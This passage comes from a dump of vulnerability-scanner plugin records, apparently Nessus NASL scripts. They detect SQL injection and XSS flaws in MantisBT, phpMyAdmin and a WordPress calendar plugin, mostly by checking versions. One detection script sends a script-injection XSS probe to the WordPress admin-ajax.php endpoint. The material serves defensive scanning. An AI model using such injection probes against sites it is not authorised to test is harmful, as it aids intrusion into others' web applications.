value:\"https://mantisbt.org/bugs/view.php?id=16879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mantisbt.org/bugs/view.php?id=16880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.2.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mantisbt:mantisbt\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mantis_detect.nasl\");\n script_require_keys(\"installed_sw/MantisBT\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\napp_name = \"MantisBT\";\n\ninstall = get_single_install(app_name: app_name, port: port, exit_if_unknown_ver:TRUE);\ninstall_url = build_url(port:port, qs:install['path']);\nversion = install['version'];\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions 1.1.0 < 1.2.16 are vulnerable\nif (\n (ver[0] == 1 && ver[1] == 1) ||\n (ver[0] == 1 && ver[1] == 2 && ver[2] < 16)\n)\n{\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 1.2.16\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "Fedora 20 : mantis-1.2.17-1.fc20 (2014-3421)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mantis", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-3421.NASL", "href": "https://www.tenable.com/plugins/nessus/72970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-3421.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72970);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_bugtraq_id(65445, 65461, 65903);\n script_xref(name:\"FEDORA\", value:\"2014-3421\");\n\n script_name(english:\"Fedora 20 : mantis-1.2.17-1.fc20 (2014-3421)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1063111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1071459\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130035.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2dbf7df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mantis package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mantis-1.2.17-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mantis\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:54", "description": "new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-13T00:00:00", "type": "nessus", "title": "Fedora 19 : mantis-1.2.17-1.fc19 (2014-3440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2014-2238"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mantis", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-3440.NASL", "href": "https://www.tenable.com/plugins/nessus/72973", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-3440.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72973);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\", \"CVE-2014-2238\");\n script_bugtraq_id(65445, 65461, 65903);\n script_xref(name:\"FEDORA\", value:\"2014-3440\");\n\n script_name(english:\"Fedora 19 : mantis-1.2.17-1.fc19 (2014-3440)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new upstream release, fixing security issues :\n\n - CVE-2014-1608\n\n - CVE-2014-1609\n\n - CVE-2014-2238\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1063111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1071459\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-March/130019.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b5756c84\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mantis package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mantis-1.2.17-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mantis\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:48", "description": "The remote web server is hosting MantisBT, an open source bug tracking application written in PHP.\n\nVersions of MantisBT 1.1.0 prior to 1.2.16 are potentially affected by multiple vulnerabilities :\n\n - A cross-site scripting vulnerability exists because the application does not validate the 'project_id' parameter upon submission to the 'account_sponsor_page.php' script. This may allow a malicious user with 'project manager' access to execute arbitrary script code within the browser / server trust relationship with a specially crafted request. (CVE-2013-4460)\n\n - A SQL injection vulnerability exists due to the 'db_query()' function not properly sanitizing user-supplied input passed via a 'mc_issue_attachment_get' SOAP request. This may allow an authenticated remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. This issue affects version 1.1.0a4 or later. (CVE-2014-1608)\n\n - Multiple SQL injection flaws exist in 'core/news_api.php', 'core/summary_api.php', 'plugins/MantisGraph/core/graph_api.php', 'api/soap/mc_project_api.php', and 'proj_doc_page.php' pages. This could allow a remote attacker to inject or manipulate SQL queries, allowing for the manipulation or disclosure of arbitrary data. This issue only affects versions 1.2.0 - 1.2.15. (CVE-2014-1609)", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "MantisBT 1.1.0 < 1.2.16 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609", "CVE-2013-4460"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*"], "id": "8900.PRM", "href": "https://www.tenable.com/plugins/nnm/8900", "sourceData": "Binary data 8900.prm", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:55", "description": "The remote host is affected by the vulnerability described in GLSA-201505-03 (phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote authenticated attacker could exploit these vulnerabilities to include and execute arbitrary local files via a crafted parameter, inject SQL code, or to conduct Cross-Site Scripting attacks.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-06-01T00:00:00", "type": "nessus", "title": "GLSA-201505-03 : phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4987", "CVE-2014-6300", "CVE-2014-8958", "CVE-2014-8959", "CVE-2014-8960", "CVE-2014-8961"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:phpmyadmin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201505-03.NASL", "href": "https://www.tenable.com/plugins/nessus/83912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201505-03.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83912);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-6300\", \"CVE-2014-8958\", \"CVE-2014-8959\", \"CVE-2014-8960\", \"CVE-2014-8961\");\n script_bugtraq_id(68803, 68804, 69790, 71243, 71244, 71245, 71247);\n script_xref(name:\"GLSA\", value:\"201505-03\");\n\n script_name(english:\"GLSA-201505-03 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201505-03\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote authenticated attacker could exploit these vulnerabilities to\n include and execute arbitrary local files via a crafted parameter, inject\n SQL code, or to conduct Cross-Site Scripting attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201505-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.2.13'\n All phpMyAdmin 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.1.14.7'\n All phpMyAdmin 4.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-4.0.10.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 4.2.13\", \"rge 4.1.14.7\", \"rge 4.0.10.6\", \"rge 4.0.10.15\", \"rge 4.0.10.16\", \"rge 4.0.10.17\", \"rge 4.0.10.18\"), vulnerable:make_list(\"lt 4.2.13\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:47:57", "description": "The version of the Google Calendar Events plugin for WordPress installed on the remote host fails to properly sanitize user-supplied input to the 'gce_feeds_ids' parameter of the 'admin-ajax.php' script before returning it to users. An attacker can use this to execute arbitrary script code within the context of the user's browser.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-21T00:00:00", "type": "nessus", "title": "Google Calendar Events Plugin for WordPress 'admin-ajax.php' XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7138"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_GOOGLE_CALENDAR_EVENTS_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/79385", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79385);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7138\");\n script_bugtraq_id(70370);\n\n script_name(english:\"Google Calendar Events Plugin for WordPress 'admin-ajax.php' XSS\");\n script_summary(english:\"Attempts to inject script code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a cross-\nsite scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Google Calendar Events plugin for WordPress\ninstalled on the remote host fails to properly sanitize user-supplied\ninput to the 'gce_feeds_ids' parameter of the 'admin-ajax.php' script\nbefore returning it to users. An attacker can use this to execute\narbitrary script code within the context of the user's browser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://philderksen.com/google-calendar-events-version-2/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/google-calendar-events/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.0.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(app_name:app, port:port);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Google Calendar Events\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"google-calendar-events/css/admin.css\"][0] =\n make_list('@package +GCE');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\nxss_test = \"'\" + '\"><script>alert(' + unixtime() + ')</script>';\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/wp-admin/admin-ajax.php',\n qs : 'action=gce_ajax&gce_type=page&gce_feed_ids=' + urlencode(str:xss_test),\n pass_re : \"gce-month-title\",\n pass_str : \"<script>alert(\"\n);\n\nif (!exploit) audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:09:49", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.3, 4.1.x prior to 4.1.14.4, or 4.2.x prior to 4.2.8.1. It is, therefore, affected by an input-validation error related to the 'micro history' feature that could allow a DOM-based cross-site scripting attack that could further lead to cross-site request forgery attacks.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-16T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.3 / 4.1.x < 4.1.14.4 / 4.2.x < 4.2.8.1 Micro History XSS and XSRF Vulnerabilities (PMASA-2014-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_10.NASL", "href": "https://www.tenable.com/plugins/nessus/77702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77702);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.3 / 4.1.x < 4.1.14.4 / 4.2.x < 4.2.8.1 Micro History XSS and XSRF Vulnerabilities (PMASA-2014-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\ncross-site scripting and cross-site request forgery vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.3, 4.1.x prior to 4.1.14.4, or 4.2.x prior to 4.2.8.1. It is,\ntherefore, affected by an input-validation error related to the 'micro\nhistory' feature that could allow a DOM-based cross-site scripting\nattack that could further lead to cross-site request forgery attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/33b39f9f1dd9a4d27856530e5ac004e23b30e8ac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ef26e90\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin 4.0.10.3 / 4.1.14.4 / 4.2.8.1 or later, or apply\nthe patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n 